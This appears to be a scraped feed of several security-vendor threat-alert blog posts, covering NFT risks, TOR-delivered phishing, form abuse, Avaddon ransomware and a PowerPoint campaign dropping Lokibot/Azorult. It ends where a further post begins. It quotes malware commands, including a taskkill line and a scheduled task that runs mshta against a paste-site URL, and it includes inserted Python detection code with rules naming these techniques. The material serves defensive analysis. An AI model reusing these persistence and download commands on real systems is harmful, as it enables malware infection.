David Pickett / en NFTs – How Safe Are They? /resources/blog/july-2021/nfts-how-safe-are-they <span>NFTs – How Safe Are They?</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Tue, 07/27/2021 - 22:58</span> <a href="/taxonomy/term/31" hreflang="en">Trends</a> <a href="/taxonomy/term/58" hreflang="en">David Pickett</a> <article><img src="/sites/default/files/2021-07/NFT_thumbnail_0.jpg" width="1400" height="637" alt="Phone with NFT marketplace screen showing" loading="lazy" typeof="foaf:Image" /></article><p><span><span><span>Just this March, Christie’s Auction House sold a piece of non-fungible token (NFT) based art for more than $69 thousand dollars. Since then, NFTs have continued to capture the attention of consumers, celebrities, and businesses around the world, but the associated security risks are very real. </span></span></span></p> <p><span><span><span>While discovering new and inventive ways to exchange currency is par for the course in the digital age we live in, being aware of the security risks and taking action to mitigate them will be imperative in both the short and long term.</span></span></span></p> <p><span><span><span><strong>What are NFTs?</strong></span></span></span></p> <p><span><span><span>NFTs are pieces of digital content that are stored on a blockchain, the same foundation that underlies other cryptocurrencies such as Bitcoin or Ethereum. What sets NFTs apart from other cryptocurrencies like Bitcoin and Ethereum is that each token is completely unique, so, unlike its predecessors, they cannot be traded or replicated.</span></span></span></p> <p><span><span><span><strong>How safe are NFTs?</strong></span></span></span></p> <p><span><span><span>NFTs are a burgeoning industry that, being blockchain-based like cryptocurrencies, lacks regulation and oversight by design. 
As such, the security implications will exponentially increase as user adoption grows with new attack vectors continuously discovered. It’s no secret threat actors are motivated opportunists who will attempt to pilfer any asset, physical or digital, that holds value. There have been many high-profile wallet storage attacks in the cryptocurrency industry over the years. Likewise, NFT wallets are an unregulated industry with private companies utilizing varying degrees of cybersecurity defense techniques to prevent attacks. So in short – they aren’t very secure. </span></span></span></p> <p><span><span><span>Also in March, attackers compromised multiple Nifty Gateway NFT user accounts and were able to transfer the previously purchased NFTs from their account and purchase new ones to transfer with their payment cards on file. While the users’ cash was recovered, the NFTs were lost to the attackers who promptly sold them to another NFT purchaser located on a different platform since the platform itself, like Nifty Gateway, holds the private keys associated with the NFT and they weren’t recoverable after being transferred.</span></span></span></p> <p><span><span><span><strong>How can you stay safe when handling NFTs?</strong></span></span></span></p> <p><span><span><span>The most important things users can do to protect their NFTs are simple but important actions to take on all online accounts, which include:</span></span></span></p> <ul><li><span><span><span><strong>Multi-factor authentication (MFA)</strong>: While it’s not a failsafe, this simple step makes it exponentially more difficult for threat actors to gain access to your account. 
By connecting your logins with a phone number or an alternate email account, you can get a notification if someone is attempting to access your account.</span></span></span></li> <li><span><span><span><strong>Password hygiene</strong>: This may seem like another no-brainer, but both consumers and businesses have trouble taking the necessary steps to ensure the safety of the passwords themselves. To have good password hygiene, you must use (1) lower and uppercase letters, (2) numbers, (3) special characters and (4) different and unique passwords for every account. While it takes more effort to remember which password you use on which site, there are tools out there that can securely store your passwords, like Keeper or LastPass.</span></span></span></li> <li><span><span><span><strong>Secure Storage</strong>: For both users and companies, when applicable and done properly, cold storage of digital assets (meaning not stored in an online environment) offers the best security from Internet-connected thieves. But even then, cold storage solutions, whether hardware, paper or desktop wallets, must still be physically secured to protect against loss, damage or theft.</span></span></span></li> </ul><p><span><span><span>Because the NFT industry lacks regulation and oversight, it’s no secret among threat actors that legal loopholes exist in the industry that allow some to operate with impunity in certain scenarios. If you currently own NFTs or are thinking about buying, the best way to proceed is to educate yourself on the vulnerabilities and take the above steps to secure your environment. </span></span></span></p> <p><span><span><span><a rel="nofollow">For more information on how Zix can protect your financial data including NFTs, check out our </a><a href="/solutions/industry/financial-services" rel="nofollow">Financial Services page</a>. 
</span></span></span></p> <a href="/resources/blog/secure-modern-workplace" hreflang="en">Secure Modern Workplace</a> Wed, 28 Jul 2021 03:58:49 +0000 admin 422 at Anonymous Email Attacks via TOR on the Rise /resources/blog/august-2020/anonymous-email-attacks-via-tor-rise <span>Anonymous Email Attacks via TOR on the Rise</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Fri, 08/21/2020 - 18:36</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/58" hreflang="en">David Pickett</a> <article><img src="/sites/default/files/2021-03/stock_bad_0.jpg" width="940" height="450" alt="man drinking coffee with email error on screen" loading="lazy" typeof="foaf:Image" /></article><p>The Onion Router (TOR) is best known for its ability to anonymize internet web surfing using the specialized open-source software located at torproject.org. It does this for free by encrypting the communication and passing it at random through a network of volunteers who operate and maintain relay servers (circuits). An exit node is the last server in the chain; it performs the final decryption step and sends the original data to its destination.</p> <p>Email administrators may not realize that TOR is heavily abused for a variety of attacks. In July alone, for example, Zix/AppRiver Advanced Email Threat Protection filters caught over 350,000 messages destined for customers originating from TOR exit node IP addresses. Much of this traffic consisted of comment-form and dating spam. 
However, more serious threats such as malware, phishing, and COVID-19 themed scams also persist from the TOR exit nodes.</p> <h3><strong>Email Threat Examples Delivered from TOR Exit Nodes</strong></h3> <p><em>Malware – DHL Theme / AgentTesla Remote Access Trojan</em><br /> AgentTesla is a remote access trojan under active development that is popular among threat actors because of its price point and ease of deployment. The recent addition of a wifi profile stealing module suggests it may soon become more ambitious by gaining the ability to proliferate by compromising other systems on the same wifi network.</p> <article class="align-center"><img src="/sites/default/files/2021-03/tor_malware_0.png" width="1162" height="588" alt="tor malware" loading="lazy" typeof="foaf:Image" /></article><p>The advertisement for AgentTesla below displays its different license options along with a chatbot to answer questions from those seeking to purchase the software.</p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2021-03/agenttesla_gs1.png" width="1807" height="840" alt="Phishing – Adobe Themed Email" loading="lazy" typeof="foaf:Image" /></article><figcaption><em>Phishing – Adobe Themed Email</em></figcaption></figure><p>This phishing message is an example of an attack delivered from a TOR exit node. The threat actor has chosen to utilize an Adobe Cloud shared document theme with a payload link that adds visual legitimacy by appearing to direct the user to intuit.com. 
However, upon clicking, this link redirects the recipient to a credential harvesting site hosted on Amazon AWS.</p> <article class="align-center"><img src="/sites/default/files/2021-03/torexit_phish1_eml.png" width="1381" height="893" alt="phishing email" loading="lazy" typeof="foaf:Image" /></article><figure role="group" class="align-center"><article><img src="/sites/default/files/2021-03/torexit_phish1_portalpng.png" width="1425" height="965" alt="Phishing – Adobe Themed Email Leads to Credential Harvesting Site" loading="lazy" typeof="foaf:Image" /></article><figcaption><em>Phishing – Adobe Themed Email Leads to Credential Harvesting Site</em></figcaption></figure><p><em>COVID-19 Loan Scam Example</em><br /> This last TOR exit node scam example purports to be from the United Nations COVID-19 Pandemic Trust Fund, offering applicants a low interest rate loan. The goal is to gather sensitive information that would enable the scammer to conduct financial fraud or identity theft. Fortunately, the intended recipient was never exposed to the message because they were protected by Zix/AppRiver.</p> <article class="align-center"><img src="/sites/default/files/2021-03/tor_covid19loan.png" width="1230" height="703" alt="tor covid loan" loading="lazy" typeof="foaf:Image" /></article><p>Our <a href="/products/email-threat-protection" rel="nofollow">Email Threat Protection</a> caught these TOR exit node scam attacks along with many more. 
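</p> <p>The filter check described above, as an added example that is not Zix/AppRiver code: it walks a message's Received headers outward from our own MX to find the relay that actually connected, then tests that address against an exit-node set. The MX address, the exit-node addresses and both messages are constructed assumptions; a real deployment loads the Tor Project's published exit list and refreshes it.</p>

```python
"""Decide whether an inbound message was handed to us by a TOR exit node.

Added example, not Zix/AppRiver code. The exit-node set and both sample
messages are constructed from RFC 5737 documentation addresses.
"""
import email
import ipaddress
import re
from email import policy

# Constructed: addresses standing in for current TOR exit nodes.
TOR_EXIT_NODES = {ipaddress.ip_address(a) for a in ("192.0.2.10", "198.51.100.77")}
# Constructed: our own MX. Received headers it wrote are trusted; the
# first hop beyond it is the relay that actually connected to us.
TRUSTED_MX = {ipaddress.ip_address("203.0.113.5")}

# The bracketed literal address an MTA records in "Received: from ... [ip]".
RECEIVED_IP = re.compile(r"\[(?:IPv6:)?([0-9A-Fa-f.:]+)\]")


def received_ips(msg):
    """IPs from Received headers in header order (newest hop first)."""
    out = []
    for value in msg.get_all("Received", []):
        m = RECEIVED_IP.search(str(value))
        if not m:
            continue
        try:
            out.append(ipaddress.ip_address(m.group(1)))
        except ValueError:
            continue  # malformed literal, skip it
    return out


def connecting_relay(raw_message):
    """Return the first Received IP not belonging to our MX, as a string,
    or None when no usable Received header exists."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    for ip in received_ips(msg):
        if ip not in TRUSTED_MX:
            return str(ip)
    return None


def is_from_tor_exit(raw_message):
    ip = connecting_relay(raw_message)
    return ip is not None and ipaddress.ip_address(ip) in TOR_EXIT_NODES


# Constructed: comment-form spam relayed to us by an exit node.
SAMPLE_VIA_TOR = """\
Received: from mx1.example.net (mx1.example.net [203.0.113.5])
    by filter.example.net with ESMTP; Fri, 21 Aug 2020 10:00:00 +0000
Received: from unknown (HELO mail) ([192.0.2.10])
    by mx1.example.net with SMTP; Fri, 21 Aug 2020 09:59:58 +0000
From: contact@example.org
To: sales@example.net
Subject: Website contact form

Please see our offer.
"""

# Constructed: ordinary partner mail delivered from a normal mail server.
SAMPLE_DIRECT = """\
Received: from mx1.example.net (mx1.example.net [203.0.113.5])
    by filter.example.net with ESMTP; Fri, 21 Aug 2020 10:05:00 +0000
Received: from mail.partner.example (mail.partner.example [203.0.113.200])
    by mx1.example.net with ESMTPS; Fri, 21 Aug 2020 10:04:58 +0000
From: ops@partner.example
To: sales@example.net
Subject: Invoice

Attached.
"""

if __name__ == "__main__":
    for name, raw in (("via TOR", SAMPLE_VIA_TOR), ("direct", SAMPLE_DIRECT)):
        print(name, connecting_relay(raw), is_from_tor_exit(raw))
```

<p>A hit is one signal to weight alongside content and sender-reputation checks, since legitimate mail also leaves TOR exit nodes.</p> <p>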
Contact us today for a trial!</p> Fri, 21 Aug 2020 23:36:45 +0000 admin 123 at Zix Blocks Major Form & Survey Abuse Attacks Targeting Microsoft 365 Users /resources/blog/july-2020/zix-blocks-major-form-survey-abuse-attacks-targeting-microsoft-365-users <span>Zix Blocks Major Form & Survey Abuse Attacks Targeting Microsoft 365 Users</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Thu, 07/09/2020 - 18:08</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/58" hreflang="en">David Pickett</a> <article><img src="/sites/default/files/2021-03/goog_forms_portal_0.png" width="940" height="450" alt="DHL spoof site" loading="lazy" typeof="foaf:Image" /></article><p>Over the past 24 hours alone, Zix/AppRiver advanced email threat protection filters have stopped over 88,000 messages attempting to abuse legitimate forms and survey services. The total count of blocked attacks jumps to an astonishing 590,000 messages over the course of the past week. These numbers provide a glimpse into just how pervasive living off the land attacks have recently become.</p> <p>In July of 2019, we <a href="https://appriver.com/blog/phishing-attacks-abuse-office-online-surveys" rel="nofollow">detailed</a> how attackers were abusing Microsoft Office Excel & Forms Online Surveys to host credential harvesting sites on the service without the need for an external phishing site. These malicious schemes were on Microsoft's radar too, as they added <a href="https://www.bleepingcomputer.com/news/security/microsoft-adds-automatic-phishing-detection-to-microsoft-forms/" rel="nofollow">increased automation for phishing detection to their roadmap</a> in this same time period. 
Since then, attackers have rapidly warmed up to the idea of launching more Living Off the Land (LOtL) attacks by abusing a variety of legitimate form and survey providers.</p> <h3><strong>Top Abused Providers & Metrics</strong></h3> <p>Metrics derived from our advanced email protection filters for these LOtL attacks indicate they have increased over time. Currently, the legitimate providers with the highest volume of blocked messages, in order from greatest to least volume, are:</p> <ol><li>Google Forms</li> <li>Microsoft Forms</li> <li>SurveyGizmo Surveys</li> <li>HubSpot Forms</li> </ol><figure role="group" class="align-center"><article><img src="/sites/default/files/2021-03/msforms1_0_1.png" width="1347" height="643" alt="Microsoft Forms Abuse Example" loading="lazy" typeof="foaf:Image" /></article><figcaption><em>Microsoft Forms Abuse Example</em></figcaption></figure><h3><strong>A Growing Trend to Intermediary Redirect/Jump Pages</strong></h3> <p>While not a new tactic, there has been a growing trend by these attackers over the past months to utilize an intermediary redirect/jump page before the credential harvesting page. These threat actors still rely upon the legitimate provider for the initial link, but then attempt to either automatically redirect or trick the user into manually clicking onward to the page designed to solicit and steal user credentials.</p> <p>This tactic is used for a variety of reasons:</p> <ul><li>The most obvious: because these links point to legitimate services, they help defeat user awareness training that teaches people to look for suspicious links.</li> <li>Certain providers are becoming more effective at identifying this type of abuse on their site and removing the page faster.</li> <li>It allows the attacker to autonomously switch phishing links in their email campaigns once the intermediary site is discovered and removed by the service, saving the time and resources of setting up a new credential harvesting site. 
They can direct a bot to identify when the site is removed. Once it is removed, they automatically change the link in the sending scripts so the phishing campaign continues with little to no downtime.</li> </ul><figure role="group" class="align-center"><article><img src="/sites/default/files/2021-03/goog_forms_eml_0.png" width="1492" height="844" alt="DHL Spoofing Email Abusing Google Dynamic Link to Forms" loading="lazy" typeof="foaf:Image" /></article><figcaption><em>DHL Spoofing Email Abusing Google Dynamic Link to Forms</em></figcaption></figure><p>Not already a Zix email threat protection customer? <a href="/products/email-threat-protection" rel="nofollow">Learn how Zix’s advanced threat protection solutions can help keep your organization safe against living off the land attacks.</a></p> Thu, 09 Jul 2020 23:08:45 +0000 admin 115 at Phorphiex/Trik Botnet Delivers Avaddon Ransomware /resources/blog/june-2020/phorphiextrik-botnet-delivers-avaddon-ransomware <span>Phorphiex/Trik Botnet Delivers Avaddon Ransomware</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Mon, 06/08/2020 - 17:57</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/58" hreflang="en">David Pickett</a> <article><img src="/sites/default/files/2021-03/avaddon_logo_2.png" width="940" height="450" alt="avaddon logo" loading="lazy" typeof="foaf:Image" /></article><p>The Zix/AppRiver threat team is no stranger to the Phorphiex/Trik botnet and its wide-ranging attacks. On Thursday June 4th, we began capturing a campaign distributed by the same botnet that mirrors the techniques, tactics, and procedures used by <a href="https://appriver.com/blog/phorphiextrik-botnet-campaign-leads-to-multiple-infections-ransomware-banking-trojan-cryptojacking" rel="nofollow">one we protected against and analyzed last April</a>. 
However, this campaign delivers the new Avaddon ransomware, whose name translates to Abaddon, meaning doom or destruction.</p> <p>The theme for these messages is very simple. All contain various subject lines that attempt to entice the recipient to open a “photo”, along with a wink emoji in the body of the email. The display names for the campaign appear to be all male sender names, unlike the female names observed in the campaign last year. As last year, the attackers again used four numbers as the friendly-from domain for this campaign. As of the time this article was written, our Advanced Email Threat Protection filters have captured well over 300,000 of these messages.</p> <article class="align-center"><img src="/sites/default/files/2021-03/eml1_2020.png" width="1382" height="281" alt="email example" loading="lazy" typeof="foaf:Image" /></article><h3>The Zip Attachment - Malicious JavaScript</h3> <p>All of the messages contain an attachment that arrives in the IMG<number>.jpg.js.zip format. Once the zip is extracted, there is a small 1 kilobyte JavaScript file inside. This is much smaller than last year’s campaign of 8 kilobytes, largely because the latest version does not contain any additional obfuscation techniques.</p> <article class="align-center"><img src="/sites/default/files/2021-03/js_fileimg.png" width="764" height="81" alt="email attachment" loading="lazy" typeof="foaf:Image" /></article><p>The file launches Windows Script Host to run a command launching PowerShell with the execution policy bypass flag. This directs Windows to run the unsigned script without being blocked or displaying any warnings. A file named sava.exe is then downloaded from the IP of 217[.]8[.]117[.]63 into the local temp folder and saved as 5203508738.exe, before it’s executed. 
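</p> <p>The attachment pattern described above, as an added example that is not Zix/AppRiver code: a triage routine that opens a zip attachment in memory and reports the IMG&lt;number&gt;.jpg.js.zip naming, a script member hiding behind an image extension, its small size, and a PowerShell policy-bypass string in its body. The archive and its inert stand-in script are constructed; the extension sets and the 4 KB size threshold are assumptions.</p>

```python
"""Triage a zip attachment for the IMG<number>.jpg.js.zip pattern used by
the Phorphiex/Trik campaign: a tiny script member behind an image extension.

Added example, not Zix/AppRiver code. The archive and the script body are
constructed in memory; the script is an inert stand-in, not the dropper.
"""
import io
import re
import zipfile
from pathlib import PurePosixPath

SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1"}
DECOY_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".doc", ".docx", ".xls"}
SMALL_SCRIPT_BYTES = 4096  # assumed; the campaign's member was about 1 KB
OUTER_NAME_RX = re.compile(r"^img\d+\.(?:jpe?g|png)\.(?:js|jse|vbs|wsf)\.zip$", re.I)


def suffixes(name):
    """Lower-cased extension chain: 'IMG1.jpg.js' -> ['.jpg', '.js']."""
    return [s.lower() for s in PurePosixPath(name).suffixes]


def double_extension(name):
    """('.jpg', '.js') when a decoy extension precedes a script extension."""
    sfx = suffixes(name)
    if len(sfx) >= 2 and sfx[-1] in SCRIPT_EXTS and sfx[-2] in DECOY_EXTS:
        return sfx[-2], sfx[-1]
    return None


def scan_zip_attachment(filename, data):
    """Return a list of findings for one attachment; empty means clean."""
    findings = []
    sfx = suffixes(filename)
    if OUTER_NAME_RX.match(filename):
        findings.append(f"{filename}: matches the IMG<number>.jpg.js.zip naming pattern")
    elif len(sfx) >= 2 and sfx[-1] == ".zip" and sfx[-2] in SCRIPT_EXTS:
        findings.append(f"{filename}: archive name ends in a script extension")
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings + [f"{filename}: not a valid zip archive"]
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            member = info.filename
            pair = double_extension(member)
            if pair:
                findings.append(f"{member}: {pair[0]} decoy before {pair[1]} script")
            msfx = suffixes(member)
            last = msfx[-1] if msfx else ""
            if last in SCRIPT_EXTS and info.file_size <= SMALL_SCRIPT_BYTES:
                findings.append(f"{member}: small script ({info.file_size} bytes)")
                # Small enough to read whole: look for the PowerShell bypass step.
                body = zf.read(info).decode("latin-1").lower()
                if "powershell" in body and "bypass" in body:
                    findings.append(f"{member}: invokes PowerShell with policy bypass")
    return findings


def build_zip(member_name, content):
    """Constructed single-member archive for the samples below."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member_name, content)
    return buf.getvalue()


# Inert stand-in: only the strings a triage rule keys on, no payload.
STANDIN_JS = '// constructed sample\nvar cmd = "powershell -ExecutionPolicy Bypass";\n'
MALICIOUS_NAME = "IMG126172.jpg.js.zip"
MALICIOUS_ZIP = build_zip("IMG126172.jpg.js", STANDIN_JS)
BENIGN_NAME = "IMG126172.jpg.zip"
BENIGN_ZIP = build_zip("IMG126172.jpg", b"\xff\xd8\xff\xe0" + bytes(2000))

if __name__ == "__main__":
    for name, blob in ((MALICIOUS_NAME, MALICIOUS_ZIP), (BENIGN_NAME, BENIGN_ZIP)):
        print(name, scan_zip_attachment(name, blob))
```

<p>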
The entire payload chain was completed in under a minute in our test environment, with our files encrypted using the .avdn extension.</p> <article class="align-center"><img src="/sites/default/files/2021-03/js_text.png" width="1213" height="188" alt="source" loading="lazy" typeof="foaf:Image" /></article><h3>The Ransom Note & Site</h3> <p>A readme file was left on the desktop with the initial ransom message directing us to a darknet onion address for further decryption information.</p> <article class="align-center"><img src="/sites/default/files/2021-03/avaddon_lock%20.png" width="1265" height="718" alt="avaddon ransom page" loading="lazy" typeof="foaf:Image" /></article><p>Once the victim browses to the darknet site they are required to input a unique encryption ID found inside the readme file. Once entered, a timer begins a countdown and displays the monetary demand. In our test environment, we were given 7 days and 12 hours for the $600 USD demand to be paid via bitcoin before the ransom would have been doubled. However, we have also <a href="https://twitter.com/CryptoInsane/status/1268866263188680708?s=20" rel="nofollow">seen a report of a $500 USD demand</a>, so demands are likely to vary.</p> <article class="align-center"><img src="/sites/default/files/2021-03/avaddon_demandinstructions.png" width="1659" height="1485" alt="avaddon demand" loading="lazy" typeof="foaf:Image" /></article><p>The site also provides instructions on multiple methods for obtaining bitcoin, and 24/7 support assistance via a chat interface. Also included is a QR code and unique bitcoin wallet address for payment.</p> <p>The threat actors provide the capability to test decryption with 3 image files to establish trust, and further specify that images are not typically worth as much as other encrypted data. 
The site offers 9 different language options, providing insight into the wide range of nationalities and victims targeted by the attack.</p> <article class="align-center"><img src="/sites/default/files/2021-03/avaddon_whatsthematter%20%281%29.png" width="1645" height="925" alt="avaddon page" loading="lazy" typeof="foaf:Image" /></article><h3>Affiliate Recruitment and Software Capability Ads</h3> <p>No less than 24 hours before the botnet began sending these malicious messages, researchers began finding affiliate recruitment ads with the ransomware featured on a popular darknet Russian hacking forum. We reached out to researcher David Montenegro (<a href="https://twitter.com/CryptoInsane" rel="nofollow">@CryptoInsane</a> on Twitter) who <a href="https://twitter.com/CryptoInsane/status/1268440645770805248?s=20" rel="nofollow">found the threat actor's advertisement</a> images and graciously granted us permission to share them for this blog.</p> <article class="align-center"><img src="/sites/default/files/2021-03/avaddon_logo_2.png" width="940" height="450" alt="avaddon logo" loading="lazy" typeof="foaf:Image" /></article><article class="align-center"><img src="/sites/default/files/2021-03/avaddon_affiliate_recruting.png" width="1948" height="1143" alt="avaddon affiliate" loading="lazy" typeof="foaf:Image" /></article><h3>Indicators of Compromise</h3> <p>Main object "IMG126172.jpg.js"<br /> sha256 cc4d665c468bcb850baf9baab764bb58e8b0ddcb8a8274b6335db5af86af72fb<br /> Dropped Executable File<br /> sha256 05af0cf40590aef24b28fa04c6b4998b7ab3b7f26e60c507adb84f3d837778f2<br /> Malicious IP Connection 217.8.117[.]63</p> <p>The above IP should be blocked for all communication attempts; it was previously observed loading <a href="https://www.cyber.nj.gov/threat-center/alerts-advisories" rel="nofollow">Predator the Thief</a> in December 2019.</p> Mon, 08 Jun 2020 22:57:51 +0000 admin 112 at PowerPoint Malware References Drake Lyrics to Drop Lokibot 
& Azorult /resources/blog/january-2020/powerpoint-malware-references-drake-lyrics-drop-lokibot-azorult <span>PowerPoint Malware References Drake Lyrics to Drop Lokibot & Azorult</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Mon, 01/20/2020 - 15:01</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/58" hreflang="en">David Pickett</a> <article><img src="/sites/default/files/2021-03/Drake%20Img.jpg" width="940" height="450" alt="Drake" loading="lazy" typeof="foaf:Image" /></article><p>A malware campaign using PowerPoint as the infection vector caught our eye after we noticed it contained lyrics to a popular Drake song hidden inside a PowerShell command. Depending on the victim, it either dropped the Lokibot info stealer or the Azorult remote access trojan. This infection chain all starts with a simple email, such as the example pictured below.</p> <article class="align-center"><img src="/sites/default/files/2021-03/Drake%20Blog%201_0.png" width="825" height="664" alt="email example" loading="lazy" typeof="foaf:Image" /></article><p><strong>Heavy Obfuscation</strong></p> <p>Upon opening either of the PowerPoint attachments, it automatically runs a heavily obfuscated Visual Basic script.</p> <article class="align-center"><img src="/sites/default/files/2021-03/Drake%20Blog%202.png" width="973" height="508" alt="drake blog" loading="lazy" typeof="foaf:Image" /></article><p>This script uses the Microsoft HTML application host (mshta.exe) to reach out to a Bitly shortened link (hxxp://j.mp/*) in an attempt to circumvent browser defense controls. It then uses the command line to taskkill Excel & Word, if running.</p> <p><code>"C:\Windows\System32\cmd.exe" /c taskkill /f /im excel.exe & taskkill /f /im winword.exe</code></p> <p>After that, it creates a scheduled task for mshta to reach out to a Pastebin URL every 60 minutes. 
This is where an encoded script is located, and the URL it retrieves dictates whether the recipient ultimately receives the Lokibot or Azorult payload in our samples.</p> <p><code>"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn (+main+) /tr "mshta hxxp:\\pastebin[.]com\raw\C5qNg3Dr" /F</code></p> <article class="align-center"><img src="/sites/default/files/2021-03/Drake%20Blog%203.png" width="1325" height="344" alt="drake blog" loading="lazy" typeof="foaf:Image" /></article><p>Once decoded, this translates into a PowerShell script that contains a reference to Drake's "Keke Do You Love Me" lyrics. The attacker, named “Master X” in the metadata inside the PowerPoint, had a sense of humor when creating the Invoke-Expression cmdlet call. "Master X" also obfuscated the ‘DownloadString’ inside the PowerShell script below in another attempt to avoid defense solutions monitoring PowerShell activity.</p> <article class="align-center"><img src="/sites/default/files/2021-03/Drake%20Blog%204.png" width="882" height="117" alt="Keke Do You Love Me" loading="lazy" typeof="foaf:Image" /></article><p>This script reaches out to paste.ee and downloads a malicious executable named calc.exe. 
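</p> <p>The process chain above (PowerPoint spawning mshta against a j.mp link, taskkill of Excel and Word, a scheduled task pointing mshta at Pastebin) and the wscript-to-PowerShell execution policy bypass step from the Phorphiex/Trik post earlier on this page, as one added detection example that is not Zix/AppRiver code. The process-creation log format, host names and URL paths are constructed assumptions.</p>

```python
"""Process-creation heuristics for the mshta/schtasks chain in the PowerPoint
campaign and for the wscript -> PowerShell -ExecutionPolicy Bypass step in
the Phorphiex zip campaign.

Added example, not Zix/AppRiver code. Log lines are constructed; the field
order "timestamp|host|parent_image|image|command_line" is assumed, and the
URL paths are placeholders.
"""
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Shortener and paste hosts named in the posts (j.mp, pastebin, paste.ee);
# bit.ly is the long form of j.mp.
STAGING_HOSTS = ("j.mp", "bit.ly", "pastebin.com", "paste.ee")
URL_RX = re.compile(r"https?://([^/\s\"']+)", re.I)
# -ExecutionPolicy Bypass and its abbreviations (-ep, -ex, -exec ...).
PS_BYPASS_RX = re.compile(r"-e[a-z]*\s+bypass", re.I)


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def parse_event(line):
    ts, host, parent, image, cmd = line.split("|", 4)
    return {"ts": ts, "host": host, "parent": basename(parent),
            "image": basename(image), "cmd": cmd}


def evaluate(ev):
    """Return the names of every rule the event trips, in rule order."""
    hits = []
    cmd = ev["cmd"].lower()
    urls = [h.lower() for h in URL_RX.findall(ev["cmd"])]
    # Rule 1: an Office application spawning a script host.
    if ev["parent"] in OFFICE_APPS and ev["image"] in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # Rule 2: mshta given a remote URL; worse when it is a shortener/paste site.
    if ev["image"] == "mshta.exe" and urls:
        hits.append("mshta_remote_url")
        if any(u.endswith(STAGING_HOSTS) for u in urls):
            hits.append("mshta_staging_host")
    # Rule 3: a script host killing Office applications (the taskkill step).
    if ev["parent"] in SCRIPT_HOSTS and "taskkill" in cmd \
            and any(app in cmd for app in OFFICE_APPS):
        hits.append("script_kills_office")
    # Rule 4: a scheduled task whose action is mshta fetching a URL.
    if ev["image"] == "schtasks.exe" and "/create" in cmd \
            and "mshta" in cmd and urls:
        hits.append("schtasks_mshta_remote")
    # Rule 5: wscript/cscript launching PowerShell with the policy bypassed.
    if ev["parent"] in ("wscript.exe", "cscript.exe") \
            and ev["image"] == "powershell.exe" and PS_BYPASS_RX.search(cmd):
        hits.append("script_host_powershell_bypass")
    return hits


def scan(lines):
    """Return [(host, image, [rules])] for every event that tripped a rule."""
    out = []
    for line in lines:
        ev = parse_event(line)
        hits = evaluate(ev)
        if hits:
            out.append((ev["host"], ev["image"], hits))
    return out


# Constructed sample log: the two campaigns' chains plus benign admin noise.
SAMPLE_LOG = [
    r'2020-01-20T15:01:02Z|WS01|C:\Program Files\Microsoft Office\Office16\POWERPNT.EXE|C:\Windows\System32\mshta.exe|mshta http://j.mp/placeholder',
    r'2020-01-20T15:01:03Z|WS01|C:\Windows\System32\mshta.exe|C:\Windows\System32\cmd.exe|"C:\Windows\System32\cmd.exe" /c taskkill /f /im excel.exe & taskkill /f /im winword.exe',
    r'2020-01-20T15:01:04Z|WS01|C:\Windows\System32\mshta.exe|C:\Windows\System32\schtasks.exe|"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn Main /tr "mshta http://pastebin.com/raw/placeholder" /F',
    r'2020-06-04T09:12:40Z|WS02|C:\Windows\System32\wscript.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "Write-Host constructed"',
    r'2020-06-04T09:15:00Z|WS03|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -NoProfile -Command Get-Date',
    r'2020-06-04T09:16:00Z|WS03|C:\Windows\System32\svchost.exe|C:\Windows\System32\schtasks.exe|schtasks /create /sc DAILY /tn Backup /tr "C:\Tools\backup.exe"',
]

if __name__ == "__main__":
    for host, image, rules in scan(SAMPLE_LOG):
        print(host, image, ", ".join(rules))
```

<p>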
We can see this retrieved malicious executable file header when loading up the paste.ee site.</p> <article class="align-center"><img src="/sites/default/files/2021-03/Drake%20Blog%205.png" width="1323" height="440" alt="drake blog" loading="lazy" typeof="foaf:Image" /></article><h3><strong>Sanitized Indicators of Compromise:</strong></h3> <p><strong>Lokibot sample:</strong></p> <p><strong>Azorult example:</strong></p> <p>Main object - "Purchase Order A6.pps"</p> <p>Learn more about how <strong><a href="/products/advanced-threat-protection" rel="nofollow">advanced threat protection from Zix</a></strong> can help protect your organization from this and other threats.</p> Mon, 20 Jan 2020 21:01:51 +0000 admin 84 at Ransomware Drops, Rocks, & Locks: FTCode Ransomware Plays Music While It Encrypts Your Files /resources/blog/october-2019/ransomware-ftcode-plays-music-and-encrypts-files <span>Ransomware Drops, Rocks, & Locks: FTCode Ransomware Plays Music While It Encrypts Your Files</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Thu, 10/17/2019 - 14:36</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/58" hreflang="en">David Pickett</a> 